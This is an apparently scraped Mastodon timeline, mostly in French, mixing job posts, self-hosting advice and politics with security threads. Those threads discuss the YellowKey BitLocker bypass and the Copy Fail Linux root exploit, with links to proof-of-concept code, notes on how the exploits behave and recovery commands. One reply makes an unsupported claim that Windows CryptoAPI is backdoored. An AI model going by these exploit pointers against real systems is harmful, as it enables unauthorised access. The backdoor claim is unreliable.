@OatPotato @LaQuadrature Ce n'est pas une question de jours/semaine. Si un·e salarié·e veut faire une semaine dans le sud en télétravail, ou a un problème de crèche de dernière minute et doit rester chez lui·elle un jour, il n'y a aucun problème. Mais comme c'est un poste qui implique une collaboration quotidienne avec les autres salarié·es, le lieu de travail « par défaut » est dans nos locaux.
@LaQuadrature je suis assez déçu qu'une entité comme lqdn ne propose pas du full teletravail, rien que sur le principe, je reconnais. Ça donne l'impression d'une structure centralisée et vieillotte, un peu Jacobine. Sauf si le poste exige d'être constamment en "représentation" pour ne pas dire en lobbying à l'assemblée ou dans les ministères.
@fafanarcool @LaQuadrature Si un·e salarié·e veut faire une semaine dans le sud en télétravail, ou a un problème de crèche de dernière minute et doit rester chez lui·elle un jour, il n'y a aucun problème. Mais comme c'est un poste qui implique une collaboration quotidienne avec les autres salarié·es, le lieu de travail « par défaut » est dans nos locaux.
@ungarage @LaQuadrature oui... bon... j'ai aussi un poste où je suis en collaboration *permanente* avec 12 personnes. On partage des diagrammes des schemas, demos en ecran partagé, on a des points visio-audio, plusieurs 10aines de fois par jour, on collabore avec des gens partout dans le monde. Et l'equipe est principalement localisée à Bordeaux mais plusieurs membres sont parisiens, toulousains, espagnol, lyonnais. On est tous en télétravail 5/5. On se retrouve juste pour bouffer ensemble 1j/semaine (quand on est là)... et franchement ça marche.
Même les onboardings fonctionnent.
C'est largement possible.
Je maintiens ma déception. 🤷🏻♂️
Les annonces tech "profil senior, expert multi-stack, passionné, AI native, dispo immédiate" avec un salaire de JD et zéro TT, c'est presque devenu une norme. Conditions éclatées au sol🙄 Puis on s'étonne de la qualité des candidatures. Faut pas chercher un mouton à 5 pattes...
à quel inconnu se fier ??
(et en plus on s'en fiche un peu du sujet)
@oldsysops l'inconnu que tu connais le mieux
@oldsysops Ca arrive de temps en temps. Des gens ou des groupes que je ne connais ni des lèvres ni des dents disent de se méfier d'autres gens/groupes que je ne connais pas plus, pour des raisons pas toujours précisées, souvent parce que "c'est évident" (pour les gens qui connaissent l'affaire sous-jacente sans doute, mais pas pour moi)...
Bref, ma réaction dans ce genre de cas, c'est "vu et s'en tape".😜
@oldsysops celui qui a une introduction ^^" (donc pas moi car je ne l'ai toujours pas faite ><)
why I can't remember that ??
may be because i use it only once in a year...
we need more crash server !!
Ca fait 4 mois que je la prépare avec @ClaireLemoine, notre SARL nommée #TamiaData est enfin officiellement créée.
Nous allons pouvoir faire de l'#opendata pour les collectivités territoriales et les former à la contribution aux communs numériques. On commence avec quelques mairies en #Essonne et on va étendre au fur et à mesure notre champ d'action.
Souhaitez nous bonne chance, et on pourra salarier des gens
#administration #datagouv #formation #réutilisation #openstreetmap #panoramax
@tykayn @ClaireLemoine Un lien avec Dinan (sauf erreur sur la photo) ?
@romain_mehut
Nan (ok je sors XD)
C'est bien Dinan en photo, j'ai visité deux fois c'était trop chou. Voilà le lien :D
On a mis 15 ans à s'apercevoir qu'on avait une dépendance systémique aux clouds américains. Et maintenant les politiques ouinouintent. Va-t-on mettre 15 ans à s'apercevoir qu'on va devenir dépendants des boîtes d'I.A américaines ? Ça démissionne jamais au gouvernement ?
💻 Framasoft recrute une nouvelle personne en administration système pour renforcer son équipe technique ! Spécificité à noter : besoin d'expérience forte dans la gestion du mail.
➡️ https://contact.framasoft.org/recrutement
📅 Vous avez jusqu'au 21/06/2026 pour postuler. N'hésitez pas à faire circuler !
@Framasoft en voilà une annonce de recrutement qu'elle est bien 😀 Et c'est super enthousiasmant de savoir que c'est une création de poste supplémentaire, il y a du boulot, et l'asso se porte bien. Continuez !
@Framasoft nice!
Anglais ou french meetings?
@rickyx The entire current team uses French to communicate; consequently, non-French-speaking candidates will, unfortunately, not be considered.
@Framasoft Est-ce qu'on peux postuler de l'étranger ? 
@PhilippeSa Ça peut être plus compliqué pour nous, mais ce n'est pas strictement impossible. Besoin surtout d'être francophone et dans un fuseau horaire relativement proche de CEST.
@Framasoft est-ce que c'est imaginable de postuler en presta ? Sinon, est-ce qu'un mi-temps vous conviendrait ?
Et question posée à @framasky déjà, plus ou moins sérieuse, c'est pas juste pour bosser sur la délivrabilité avec M$ hein ? 😁
bonne chance pour votre recrutement !!
How to Host Your Own #Mastodon Server on a #VPS (5 Minute Quick-Start Guide)
This article provides a guide for how to host your own Mastodon server on a VPS.
Running your own Mastodon server on a VPS is an excellent way to enjoy an efficient and secure Mastodon experience.
What is Mastodon?
Mastodon is a #decentralized social media platform that enables users to post ...
Continued 👉 https://blog.radwebhosting.com/how-to-host-your-own-mastodon-server-on-a-vps/?utm_source=mastodon&utm_medium=social&utm_campaign=mastodon.social #selfhosting #activitypub #installguide #rubygems #selfhosted #rubyonrails
@oldsysops Not quite the same, but it could connect with fediverse via activitypub
Someday we will create Snac vs Mastodon comparison :)
@oldsysops@social.dk-libre.fr AI stands for Artificial Idiot
they're just recreating wheatley from portal
Le retour de Zucman et de sa taxe petits-bras
@ciredutempsEsme
Carrément.
Au dessus de 300 000€ de patrimoine : on prend tout.
Au dessus de 40 000€ de revenus nets annuels : pareil !
@parleur ha ha. Avec ça y'a moyen de mettre en place un salaire à vie pour toustes
@parleur @ciredutempsEsme Mais enfin, tu penses à ce pauvre père de famille, comment va-t-il s’en sortir avec moins de 45 k ? :(
#JeChercheUnJob #UXDesign #Design #FLOSS
En attendant de trouver un job qui paye, j'ai décidé de ne pas rester inactive et de proposer mes services d'UX designer pour aider des projets libres sur les points suivants : stratégie, content design, vision, recherche, conception.
Si vous avez un projet libre qui a besoin d'une vue design, contactez-moi et nous verrons ce qui peut être fait.
Je me réserve le droit de choisir sur quoi intervenir.
Contactez-moi en DM 
@maeool ⤴️
@Bristow_69 volontiers pour le projet cartes.app ! Il y a plein des choses listées sur les issues codeberg.org/cartes/web :)
@Natouille@mastodon.tetaneutral.net Je crois que @purr@firefish.asso-purr.eu.org aurait bien besoin de gros polish 😅
@Natouille@mastodon.tetaneutral.net @purr@firefish.asso-purr.eu.org Je demande au passage si on aurait du budget pour faire un truc propre… Parce que là on doit être au niveau 0 je dirais 😅
@Natouille Coucou, j'en ai vu passer un hier qui cherchait justement, je n'ai pas osé te pinger.
Je look si je retrouve.
@Steve12L si c'est celui auquel je pense, c'était en fait un post de 2019
@Natouille Ben j'ai vu passer ça ce week-end mais je ne retrouve pas.
@Natouille Mobilizon ? Il manque un peu d'amour pour arriver à faire migrer Maurice et Jeannine depuis Facebook
bon j'ai une question pour les fedinautes de #grenoble :
je serais debut juin (la semaine du 1er exactement) sur #grenoble, est ce qu'il y a des restaurant sympa ou des bars interessant à [v|b]oire dans le coin?
je suis sur que oui !
Sinon pour etre plus spécifique est-ce qu'il y a un restaurant, recommandable, accessible à pied de la gare, qui accepte les groupes + de 10 personnes et qui est ouvert le lundi soir ?
je serais pas tous seul à grenoble, j'aurai surement quelques collègues (que je ne taggue pas pour préserver leur identité secrête) qui seront avec moi...
de la à dire qu'on pourrait faire un #mastoApero c'est peut etre s'avancer un peu (mais mardi soir j'ai encore rien de prévu)
@oldsysops je ne suis pas sur qu'ils puissent prendre 10 personnes, mais ce sont les meilleurs ramen que j'ai mangé (faut réserver, c'est une petite salle)
@oldsysops
Alors j’ai le Locafé qui est :
- à 7 minutes à pied depuis la gare
- ouvert le lundi soir
- accepte les groupes jusqu’à 16 max (https://www.locafegrenoble.com/groupesde8etplus)
- est très très très très bon (je pèse mes mots)
- 100% végétal donc écolo et inclusif (probablement que si on les prévient iels peuvent gérer assez facilement les allergènes)
- un peu plus cher que d’autres restos mais pour du "semi-gastro" le prix est très raisonnable
https://comaps.at/w4BAgdWT-o/Locafé
Et puis pour boire un coup il y a le Petit Labo juste en face, toujours très bonne ambiance :)
c'est pas mal, un bon debut pour soigner mon addiction au travail (/joke)
Quelqu’un a tenté Vaultwarden.fr ?
Là mes mots de passe sont sur BitWarden, et avec les infos de la reprise par un acteur douteux je veux en partir.
Ce qui m’intéresse avec Vaultwarden.fr c’est la compatibilité avec les API BitWarden, donc pas de changements sur les applis et extensions auxquelles je suis habitué.
(Ma question porte sur Vaultwarden.fr, à la limite sur Vaultwarden au sens large)
@joachim vu que tu héberges déjà un monstre en ruby, tu peux héberger vaultwarden :) c'est super light, y a pas vraiment de maintenance à part le mettre à jour (et faire un backup tous les jours).
@aspyrine j’héberge aussi quelques monstres en Python, un monstre en Go, une abomination en PHP, mais du Rust ? Pas encore :)
@joachim Vaultwarden s'héberge facilement. Sinon, que tu passes via une offre gérée ou en auto-hébergement, tu dépends toujours des extensions et applications publiées par Bitwarden pour les clients.
J'utilise Vaultwarden via une distri #yunohost perso (sur rpi4 et maintenant rpi5) depuis 4/5 ans.
Cela fonctionne parfaitement avec l'appli et l'extension Firefox BitWarden.
Plutôt satisfait du fonctionnement même si politiquement et techniquement, dépendre de BitWarden est véritablement problématique à moyen et long termes.
@bateausurleau @joachim
J'ai moi aussi #vaultwarden autohéberger via #yunohost . J'avais pas conscience d'un problème politique avec ça. Peut tu détailler? Merci.
a repartagéDans la mesure où l'application sur #android et l'extension sont développées par #bitwarden , il me semble que nous faisons face à une forme de dépendance « politiquement » néfaste au regard des pratiques non démocratiques décrites ici : https://blog.ppb1701.com/the-quiet-renovation-at-bitwarden
VaultWarden est toléré par Bitwarden et cette réalité peut être amenée à changer de façon unilatérale de la part du « nouveau » CEO de BitWarden.
En ce sens, il m'apparait que nous avons bien un problème politique ( **Orientation démocratique du projet* versus « gouvernance »)
A Note for Vaultwarden Users
Whether self-hosting stays viable long-term is the real question worth sitting with.
Right now it works because Bitwarden’s clients are open source and the server API is public. Vaultwarden implements that API, and the official apps can’t tell the difference. That depends on Bitwarden continuing to publish open source clients and not restricting which servers they’ll talk to — neither of which is guaranteed under new management.
The brake on the worst case: self-hosting is a listed Enterprise feature that generates real revenue. Killing it upsets paying business customers. That matters.
The catch: what Bitwarden sells to enterprises is their own official server stack, not Vaultwarden. Vaultwarden exists in a space they’ve tolerated but never endorsed. If the calculus shifts, the tolerance ends without any announcement. Just let the API drift until compatibility breaks on its own.
I don’t think that’s imminent. But I also thought the free tier commitment was ironclad, and “Always free” isn’t on the page anymore.
The real safety net is that Bitwarden’s clients are Apache 2.0 licensed. A fork would need a rebrand to stay clear of the trademark — different name, tweaked UI, same engine — but that’s a speed bump, not a wall. The web vault works through any browser regardless of what happens to the apps, so worst case you’d lose autofill temporarily while a fork caught up. Inconvenient, not catastrophic. Vaultwarden itself is already proof the model works.
Watch the clients. If they go closed, the community will notice fast, and the fork will follow.
Temperature check for some on-prem #selfhosting training.
Please nerdboost.
| I have a static IP at home: | 37 |
| My IP at home changes: | 82 |
| I don't know: | 7 |
La prochaine #PyConFR sera à Biarritz !
https://linuxfr.org/users/chadys/liens/la-prochaine-pyconfr-sera-a-biarritz
Si votre boite ou si vous connaissez une boite qui peut sponsoriser une conférence #Python, #need
So I’ve just had a quick play with this and yes, it works. Essentially BitLocker has a backdoor. https://github.com/Nightmare-Eclipse/YellowKey
Mitigation = BitLocker PIN and BIOS password lock.
I think my prior toot on NightmareEclipse auto deleted so to make a perm one - it isn’t me. I suspect it’s somebody who used to work at MSFT, who departed after my era.
@GossiTheDog It did cross my mind that this could perhaps be the person who used to drop 0-days on Twitter a few years ago when they were having a bad day.
For anybody looking at this, testing showed two things:
- TPM unlocked the storage
- it provides a login bypass, as you’re dumped as SYSTEM prior to Windows Hello or password login
BitLocker operates without a PIN by default so it’s basically a big gap, it’s unclear how this code made it into the production version of Windows.
I should point out I’ve only tested with one version of Windows 11 - maybe the scope is smaller.
Me and @wdormann have both recreated the BitLocker backdoor^H^H^Hvulnerability https://www.bleepingcomputer.com/news/security/windows-bitlocker-zero-day-gives-access-to-protected-drives-poc-released/
@GossiTheDog
The aurhor claims that TPM + PIN is not protection.
Personally I have a hard time understanding how that could be bypassed, as boot-time PIN happens before anything WinRE. Thoughts?
Microsoft have issued a CVE for the YellowKey BitLocker bypass and provided mitigation advice - CVE-2026-45585
My take - mitigations too fiddly to actually deploy, BitLocker+PIN and BIOS password mitigates and should be used if you are sensitive to BitLocker bypass threats.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45585
@GossiTheDog The blog of the YellowKey people claims they also have a version that works with BitLocker+PIN but they just didn't release it (yet).
RE: https://infosec.exchange/@jernej__s/116606245196397161
@GossiTheDog I made a batch file that sets up the mitigation:
- it provides a login bypass, as you’re dumped as SYSTEM prior to Windows Hello or password login
Technically you're running in WinPE with unlocked C: drive.
@GossiTheDog huh. Without testing it personally does this then let you simply run manage-bde and turn off encryption for the drives?
@GossiTheDog Do you think U.S. authorities could be investigating NightmareEclipse due to their disclosures?
I imagine Microsoft is investigating internally to determine if it's someone with previous/current access to internal info that is still legally protected (by contract or law).
Based on their posts, MS might already know their identity if they have interacted with this person via MSRC and have their payment info for the bug bounty programs.
@GossiTheDog Oh, fun.
Also for whatever reason, only windows 11 (+Server 2022/2025) are affect, windows 10 is not.
@GossiTheDog it's not clear to me what config this bypasses. is it only the no password config?
(Edit: thought about it and yeah ofc it's just that config)
@GossiTheDog could this be used to unlock a drive taken from a dead laptop/pc, when the user doesn't have the bitlocker key saved?
I was worried I'd run out of tools that do not require opening a computer/laptop case, now that Microsoft's planning to patch Bitpixie this year.
But Windows is a gift that just keeps on giving
@GossiTheDog I always assumed anything that could unlock an encrypted drive with no password or other authentication from the user could be bypassed. I figured if you don't have to enter a password, you have to assume that neither does anybody else.
@GossiTheDog This doesn't work for me. I'm using an exFat Ventoy USB (it's all I have right now) on a T16 Gen 1 and a desktop. Both with TPM, no PIN.
ThinkPad - won't boot with CTRL held down, I briefly release it on the Lenovo screen. CMD pops up but C:\ is mapped to a Ventoy partition and the BitLocker partition wasn't mounted or unlocked.
Desktop - I got to CMD and C:\ was mounted but locked.
Without the USB CMD doesn't open on either PC. I might try again later with clean NTFS USB stick.
@GossiTheDog How long do users need to observe this whack-a-mole before switching the default OS to #BSD or #Linux?
If some really needs an MS-OS it can be installed to a VM. This mitigates the issues arising from using Windows on the bare metal. The main OS must provide the basic security and #Windows does not deserve more than a Guest-VM to exist in. Such a setup allows to fence it un, to firewall it off the rest.
@GossiTheDog@cyberplace.social
Others have already pointed out that the creator states that TPM+PIN is bypassable but they just didn't release that version of the POC so I'm just going to leave everybody with this lovely clip as if this was the most predictable thing ever.
Fears of exactly this are why I use veracrypt instead, though that's probably more applicable in a personal situation like mine than an enterprise one where a bitlocker bypass would likely be more of a risk since the target is a wider organisation and not one random person's laptop.
@GossiTheDog That won't help because the #CryptoAPI itself is backdoored.
http://github.com/kkarhan/windows-ca-backdoor-fix
- Use @veracrypt or better yet: Stop using #Govware [ #Windows ] as an operating system.
Suspendre les aides publiques aux entreprises qui ont des filiales dans les paradis fiscaux et ne paient pas l'impôt ? Non, impossible disent-ils
Par contre, suivre les comptes des gens pour suspendre les minimas sociaux, oui.
Ils ne chassent pas la fraude, mais les pauvres.
Ce n'est pas comme si les aides publiques aux entreprises n'explosaient pas, 3,3 fois plus vite que les aides sociales, et, surtout 3 fois plus vite que le PIB, les rendant totalement insoutenables.
@MaximeCombes Très interessant! La comparaison en valeur (absolue) dans votre blog me paraît toutefois plus important, donc je le reprends ici également:
RE: https://mastodon.social/@rasterweb/116542832779822915
"I never expected to find my news from strangers on a federated social network that half the internet has never heard of. I never expected a lot of things. But there's something quietly beautiful about a place where people just... share what they know. No brand deals, no engagement metrics, no algorithm nudging you toward rage. It's the internet I was promised in 1996."
oldsysops a repartagéBoy was I wrong about the Fediverse
@killyourfm >No brand deals, no engagement metrics, no algorithm nudging you toward rage.
Feels like 2000's forums to me (where I started, it was the only internet available, people talking to each other, and I guess it felt special because we were islands instead of the globalized federated thing >_>).
Boy was I wrong about the Fediverse
et en plus il fait froid !
bonne journée
Je me suis lancé depuis un moment dans la création d'un #JeuVidéo (#JeuIndé et #LogicielLibre, développé avec #Godot).
Nom de code : #Engineer
https://engineer-game.org/
J'en parle depuis un moment sur mon compte dédié (en anglais) : @youen@mastodon.gamedev.place
Le projet avance bien, j'ai mis en place plusieurs briques techniques indispensables, et je vais maintenant essayer de ficeler une première version jouable.
boosts bienvenus !
Quelques détails ⤵️
Y'a un truc où je suis très sexiste.
Je ne supporte pas les persos de pdg femmes.
Elles sont aussi insupportables que les hommes mais je crois que c'est parceque je les vois comme des traitres
(Dans une moindre mesure pareil pour les cheffes)
C'est vraiment super injuste mais j'y arrive pas.
Ma psy me dirait que c'est de l'envie (et aurait pas forcément tort)
Alors que j'aime les guerrières, les pompiers, les mecaniciennes, les génies, etc....
@ciredutempsEsme est-ce que tu les détestes plus que les pdg hommes ?
@WakinUniverseJo oui. Mais les PDG homme de fiction sont souvent nonchalents alors que les femmes doivent imposer leur autorité (ce qui est crédible) mais comme j'aime pas l'autorité ça me saoule
@ciredutempsEsme surtout elles sont depeintent comme les pdg mecs, mais en femme.
On cherche pas vraiment à se dire comment serait une femme pdg. C'est peut etre ca qui te tilte.
@davidou oui aussi.
Même ds ma boîte, les femmes qui progressent maintenant, j'ai plus de compassion. Je vois bien qu'elles ont un autre style que leurs collègues masculins et qu'elles en bavent des ronds de chapeau
@ciredutempsEsme Peut être parce qu'elles prennent des traits masculins virilistes. On aimerait que des femmes qui accèdent à des postes de pouvoir proposent une autre façon d'exercer le pouvoir que de reprendre les travers compétitifs des hommes.
@Caellan je crois que je suis pas fan de l'idée des femmes de pouvoir. En vrai je voudrais que les hommes perdent le pouvoir. Pas que les femmes le prennent.
Mais oui, en effet, y'a de ça
@oldsysops @Caellan oui. Et non. Elles ne s'avilissent pas. Juste ça va pas dans le bon sens même si ces aspirations sont logiques et que je devrais l'accepter
The European Commission (@EUCommission) has updated the top follow buttons on its web page. Mastodon and Bluesky are in, X is out.
https://commission.europa.eu/index_en
#Debian security team just released DSA-6253-1 which addresses #dirtyfrag local root escalation which has been issued CVE-2026-43284 and CVE-2026-43500
@Anarcat thanks for the hard work!
@beatricejess just to be clear i'm not on the security team, others desserve the credit here :)
Concernant les 2 dernières failles de sécurité Linux, les systèmes que nous gérons ont été corrigés (les 2 fois dans la journée ou ½ journée)
Dites-voir les camarades développeur·ses, vous auriez des boites qui n'ont pas été contaminées par l'IAg à recommander pour y bosser ?
Vous savez s'il existe des job boards spécialisés ?
@matthieu Pas à ma connaissance. J'hésite à prendre un nom de domaine, une solution open-source et lancer mon propre job board anti IAg.
@matthieu
Je pense que non, les projets liés a des trucs de chatbot semblent être les seuls à recevoir des fonds pour embaucher des gens en ce moment.
La DITP va devenir la direction des services publics et récupérer une partie des missions de la Dinum | Acteurs publics
La DINUM deviendrait ARIANE, Autorité pour l’IA et le numérique de l’État, et la DITP la DSP, Direction du service public.
Des activités (qualité et accessibilité de démarches en ligne) de la DINUM devraient être transférées à la DITP avec les postes associés.
Maintenant, quid de #LaSuite ?
Toute ma #VeilleNum sur https://app.flus.fr/collections/1732141437309404145
@ThierryJoffredo il était temps de mettre au pas ces communistes rouges au couteau entre les dents qui veulent nous faire passer sous Linux !
@ThierryJoffredo Avec ARIANE, nos ministres visionnaires veulent imiter Elon Musk en fondant le spaceX de l'État combinant arianespace, le réseau (satellitaire) interministériel de l’État, Albert AI et la super app Tchap 🙃
When I was young, I learned, and was taught, how to make the computer to work efficiently and correctly, in my computer science degree.
Now it is the opposite. Do brute-force search using giant farms of computers, using a huge amount of energy and water, and get results that are not guaranteed to be correct any more.
And I was discussing with a colleague this morning that my 2001 laptop ran faster than my current top-range computer for everyday tasks. Of course, it had a much worse CPU and much less ram. And of course the software for things we still do *now* was much faster *then*.
I still have that laptop from that time running Ubuntu 4.10 from 2004 in my personal museum of computers. You would be amazed how responsive the system is for everything we do every day with a computer. I recently tested it with my son, because he was curious to see how things were then.
So we are using more powerful hardware for getting a poorer experience.
The new computers are much better for some things, such as running Agda. But, for everything else I happen to do, they were just as fast, because people programmed them in a more efficient way (they had to - there was no other way).
I feel bad for saying it, but I often tell my friends, "Computer Science has reached its rabid-orangutans-smearing-feces-on-the-wall level of devolution."
I truly cannot comprehend the level of brainrot and insanity that is SOP these days. Even before all of this "A.I." giga-grifter nonsense.
I'm sad for my friends still in the field. And sadder that it has become such a caricature of itself.
@rl_dane @MartinEscardo the whole "curl [url-quoted-by-rando-foreign-remote-anon-strangers-incented-to-betray-you-and-filter-for-gullibility] | sudo bash" trend just blows my frickin mind.
@MartinEscardo@mathstodon.xyz This is something that bothers me in general because it means hardware that is perfectly fine gets left behind by virtue of modern software or even just websites being too much, despite not providing much more to justify the extra required power. It
I remember when you could still install the old NCSA Mosaic binary on some newer hardware, which I think isn't possible anymore with chip changes. Anyway, a coworker challenged me to try it and I was like sure.
I cannot begin to describe how fast it was. Eyeblink fast. Screamingly fast. Comically fast -- I literally guffawed when it loaded one page. Like the whole webpage was a JPG it just loaded from disk. And of course a bunch of stuff didn't work, but most of it was crap I didn't want anyway.
You should try the @dillo browser sometime. It's a nice refuge from... all this nonsense. 😄
@rl_dane
Or netsurf :)
@scops @MichaelTBacon @MartinEscardo @dillo
That's practically a modern browser 😄
It even has (a teensy bit of) Javascript support!
(Kidding aside, NetSurf is pretty great. I just wish it had more keyboardy features. Dillo has fairly customizable keybinds, so you can make it almost as keyboardy as luakit/Qutebrowser/ff+vimium, but not quite)
Les personnes qui consomment davantage de fruits et légumes bio dans la cohorte Nutrinet, ont moins développé de cancers, en particulier de cancer du sein post-ménopause (de 12% à 60% de moins).
1/13
En 2018, la cohorte Nutrinet avait déjà permis de mettre en évidence un plus faible risque de cancers chez les personnes mangeant plus bio (tous aliments confondus), notamment les lymphomes non hodgkiniens et les cancers du sein post-ménopause.
L'étude de 2018 (https://jamanetwork.com/journals/jamainternalmedicine/fullarticle/2707948) étudiait les cas de cancers entre mai 2009 et novembre 2016.
La nouvelle étude (https://ajcn.nutrition.org/article/S0002-9165(26)00093-6/fulltext) s'étend de fin 2014 à novembre 2024.
L'étude de 2018 avait fortement été critiquée (à tort) car "oui mais les gens qui mangent bio sont plus riches et en meilleure santé".
J'en avais discuté ici :
https://pouet.chapril.org/@factsory/112350908106565363
Cette nouvelle étude s'intéresse au sujet un peu différemment et la critique faite en 2018 tient encore moins.
Ici les personnes de l'enquête sont classées selon leur consommation *résiduelle* de fruits et légumes (F&L) bio.
La consommation résiduelle, c'est la conso de F&L bio en plus ou en moins par rapport aux personnes qui consomment la même quantité de F&L (bio ou non).
Une conso résiduelle de 100g/jour signifie consommer 100g de F&L bio en plus par rapport aux personnes qui consomment autant de F&L que moi.
La conso résiduelle est donc indépendante de la conso totale de F&L. On a 5 groupes (Q1 à Q5) où le 1er groupe a une conso bio résiduelle très faible, alors que la conso totale de F&L est élevée : ~810g/j. (dont ~50g bio). Dans Q5 la conso de F&L est plus faible (~740g/j) mais très bio (~590g).
Dans Q1 et Q5 on a donc des populations très différentes en terme de consommation de F&L bio mais proches en termes de consommation de F&L.
À ce titre, le groupe Q3 est bien pire avec seulement 355g/j de F&L consommés.
Bien évidemment ces groupes diffèrent par d'autres variables socio-économiques ; moins d'activité physique dans Q3, (un peu) plus d'anciens fumeurs dans Q1, un moins bon respect des recommandations nutritionnelles dans Q3, des revenus comparables dans les 3 groupes, Q1 est plus âgé.
On le voit, Q1 est loin d'être le pire groupe. Bien évidemment, les études corrigent les résultats pour ces biais connus, mais on peut toujours avoir la crainte que certains facteurs ne soient pas totalement corrigés et conservent un impact. Ici, cette crainte s'évapore largement.
Ce qu'observe la nouvelle étude, c'est une baisse des cancers du sein post-ménopause dans Q5 (avec la conso résiduelle de F&L bio la plus élevée) par rapport à Q1. Une baisse de l'ordre de 40% (avec une marge d'erreur d'une vingtaine de points), malgré une conso totale de F&L plus faible dans Q5 !
Cette baisse est donc cohérente avec la baisse observée dans l'étude de 2018, qui regardait des données différentes d'une autre manière.
C'est également cohérent avec les études (https://doi.org/10.1186/s12940-023-01020-8) analysant le type de F&L consommés (selon leur niveau habituel de résidus de pesticides) et le développement de cancers.
La consommation de F&L habituellement moins exposés aux pesticides étant liée à un moindre risque de cancers dans 2 études sur 3.
Salut les linuxiens , j'ai un mail chez ovh qui a été classé comme spam. Dans le process , ils demandent de passer mon poste par un antivirus. Vous utilisez quoi ? Le repouet est doux !
@oldsysops je ne connais que clamav. Est-ce qu'il y a d'autres solutions ? O_o
@sarah_trichet_allaire je ne vois pas le rapport. Comme antivirus qui fonctionne sous Linux en plus de clamav et eset, il y a bitdefender.
Sinon, leur oui, c'est fait. Et ?
du coup, j'annule toutes mes blagues sur le divorce... (c'est dommage parce que c'etait un des avantages du mariage, pleins de nouvelles blagues nulles qui s'offrait a moi)
#DadJokeIGuess
bref prochain incident de prod prévu demain à 9:00 pour un autre client (ou pas, on verra bien).
#sysadmin
I unironically love this because it's the perfect analogy:
- you can only get 6 wild cards by cheating
- showing everybody your hand is the worst possible strategy
- it actually takes zero skill or strategy to play a wild card
- this hand can absolutely be beaten by using Skip cards, reverse cards, +2 cards, and +4 cards
- and "having all the cards" in uno means you're fucking losing anyway
le champ des possibles est infini (ou presque)
Bon dimanche, prennez soin de vous et aujourd'hui surtout : faites vous plaisir !
@oldsysops à propos de roundcube et nextcloud pour lire le mail tu as aussi snappymail en autonome qui est le webmail par défaut de nextcloud et est disponible en paquet debian.
🎸 🏳️🌈 ⁂ a repartagéHey les gens du #fediverse, j'ai souvenir d'avoir vu passer une app qui aidait à se souvenir de maintenir le contact avec des gens.
J'étais pas dans un bon endroit, du coup, j'ai pas mis ça de côté, et maintenant que ça va mieux et que j'en aurais besoin, je retrouve pu
Ça sonnait comme Rel-quelque chose
Ça vous parle ?
@oldsysops
Non, RelCheck, mais que sur iOS il semblerait
https://shelter.moe/@Nako/116507188101927824
@EwanIngvald Le nom de l’app est RelCheck, elle a été créée par @ombremad, je viens de vérifier sur son profil :)
l'exploit fourni ne permet pas de devenir root sur du arm mais c'est à mon avis juste parce que le code est pour de l'intel uniquement, en tout cas l'exploit mets le su en PLS
$ su
-bash: /usr/bin/su : impossible d'exécuter le fichier binaire : Erreur de format pour exec()
évidemment comme l'indique @bortzmeyer il ne faut PAS TEST EN PROD : mais appliquer la mitigation directement est fortement conseillé.
https://www.bortzmeyer.org/copyfail.html
et si vous être une tête brûlée comme moi et que vous avez testé l'exploit en prod il y a toujours ça pour désactiver le cache :
```
$ su
-bash: /usr/bin/su : impossible d'exécuter le fichier binaire : Erreur de format pour exec()
$ sudo -i
# echo 3 > /proc/sys/vm/drop_caches
# exit
déconnexion
$ su
Mot de passe :
```
@artlog Pour ARM, ce programme en Go devrait marcher, si j'en crois le source : https://github.com/badsectorlabs/copyfail-go
@artlog @bortzmeyer l'exploit remplace su par un elf très petit qui donne root, donc oui c'est vulnérable, mais pour une raison très bizarre les auteurs de l'exploit ont une obsession sur la taille du payload.
oui il en fournissent une implémentation miminale en assembleur :
https://github.com/badsectorlabs/copyfail-go/tree/main/payloads
je ne vois pas effectivement pas l'intérêt pour un POC...
Et en fait on pourrait même imaginer que le code fourni contenant le payload en code machine embarqué dans le code go est lui même autre chose que ce que les sources indiquent ...
Du code go qui embarque du code machine, est-ce vraiment un exploit go ?
@artlog @bortzmeyer sur mon Raspberry Pi 1B+ (32-bit), j'ai le même symptôme parce que, pour une raison que je ne m'explique pas, su est un exécutable pour Intel x86-64.
Beware of the Copy Fail PoC, it can totally break su depending on your architecture.
On arm64: -bash: /usr/bin/su: cannot execute binary file: Exec format error
To recover without rebooting:
`dpkg -S /usr/bin/su` lets you know it's shipped by `util-linux`, then `apt-get reinstall util-linux`.
@CyrilBrulebois won't clearing out the cache fix it too?
echo 3 > /proc/sys/vm/drop_caches
Their FAQ says doing that removes the momentarily corrupted su
bonne journée ensoleillé à tous
@oldsysops bon courage pour la manutention.
Ici aussi journée RTT pour changer la courroie accessoire sur la modus avec voisin mécano. Le "ça se change en 30 minutes surtout avec la RTA!" s'est (comme d'habitude) transformé en 4h de galère, merci les ingénieurs de renault pour leur maléfique créativité dans l'agencement de bidules inaccessibles ou abscons.
Today, in great dialogue at work:
- Manager A: So. For this roll out, we need you to test ALL THE THINGS for (long list of requirements).
- Me: Sure, but that will add (quick mental calculation) about 3 weeks to the deployment time.
- Manager A: Fine. We are still within the planned schedule.
- Me: Okie dokie.
(45 minutes later)
- Manager B: Yo, why don't you start deploying right now, we don't really need all those tests!?!?
- Me: could you please put this in writing, please?
1/2
- Manager B: Sure. Email OK?
- Me: Oh, absolutely. Just make sure to put Manager A in cc: please.
- Manager B: Done!
- Me, to deployment team: Just smile and enjoy the fireworks, kids. Tonight, drinks are on me... Just don't do anything until the rocks have stopped bouncing. 🤓
2/2
Oh, I certainly will...
@ParadeGrotesque
Also, keep us updated on the bouncing of the rocks! 😉
@oldsysops
Mobilisation contre la fermeture d’une classe à Rinxent
https://www.nicolasloeuillet.fr/2026/04/mobilisation-contre-la-fermeture-dune-classe-a-rinxent/
@nicosomb Je serais curieuse de savoir qui décide, selon quels critères, si c'est contournable et comment
@DelphineM la rectrice et l’inspecteur d’académie.
Contournable ? Ptet, on verra ça. Comment ? En tentant de discuter avec eux … mais ce sont des communications descendantes. Donc faut se bouger pour être entendu …
Les critères : projection de 227 élèves à la rentré ici.
11 classes.
Moyenne de 20,6 par classe, en dessous de leur seuil de 21.
Donc on ferme. Moyenne qui bascule à 22,7 …
Et évidemment, la moyenne pour rouvrir est plus élevée. De 26 à 30 je crois selon les territoires …
@nicosomb @DelphineM bah il suffit de rajouter la moitié d'un élève et c'est bon non ? 😁
C'est con les moyennes 🫤
@IhoaNn une moitié d'élève par classe, oui. @DelphineM
@nicosomb @DelphineM j'essaie d'en rire, mais leur système de comptage est idiot.
Il vous reste donc à trouver 6 élèves, les couper en deux, et donner la dernière moitié à une autre école, ça fera peut-être ouvrir une classe.
Courage.
